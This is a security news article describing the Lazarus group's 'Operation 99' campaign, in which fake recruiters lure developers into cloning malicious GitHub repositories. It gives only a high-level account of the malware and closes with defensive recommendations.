The notorious Lazarus group, a state-sponsored hacking group from North Korea, has been identified as targeting software developers in a new campaign, according to researchers from SecurityScorecard. This campaign, known as ‘Operation 99’, aims to steal sensitive data from developer environments, including source code, secrets, configuration files, and cryptocurrency wallet keys.
Researchers have noted that this campaign represents a shift in tactics for the Lazarus group, moving from broad phishing attempts to more targeted attacks on developers in the tech supply chain. The malware used by the group has also been upgraded, with enhanced obfuscation and adaptability capabilities. The reach of the campaign is extensive, with impacted victims identified across the globe.
The overarching goal of this campaign is to generate revenue for the Democratic People’s Republic of Korea (DPRK) regime. By targeting developers, the attackers indirectly threaten the projects and enterprises supported by these developers, making it an effective method of supply chain attack.
One specific focus of the campaign is freelance developers working in the cryptocurrency sector. The attackers pose as recruiters on platforms like LinkedIn, offering coding projects related to fake recruitment schemes. Victims are directed to clone a malicious GitHub repository, which then connects to command-and-control servers hosted by Stark Industries Solutions Ltd. The infrastructure is designed to deliver various payloads for second-stage execution on the victim’s machine, using heavily obfuscated Python scripts to evade detection.
The campaign deploys a multi-stage malware system with modular components, including a downloader to retrieve additional payloads, implants for keylogging, clipboard monitoring, file exfiltration, and browser credential theft. By embedding malware into developer workflows, the attackers not only compromise individual victims but also the projects and systems they contribute to.
SecurityScorecard has emphasized the need for organizations to adopt proactive security measures to address threats in the developer ecosystem. Recommendations include enhanced code repository verification, advanced endpoint security solutions, verification of recruiters and job offers on platforms like LinkedIn, and providing developers with the knowledge to identify red flags in emails, repositories, and profiles.
Overall, this new campaign by the Lazarus group highlights the evolving tactics of cybercriminals targeting developers, emphasizing the importance of robust cybersecurity measures to protect valuable intellectual property and digital assets. Developers must remain vigilant and proactive in safeguarding their systems against sophisticated cyber threats.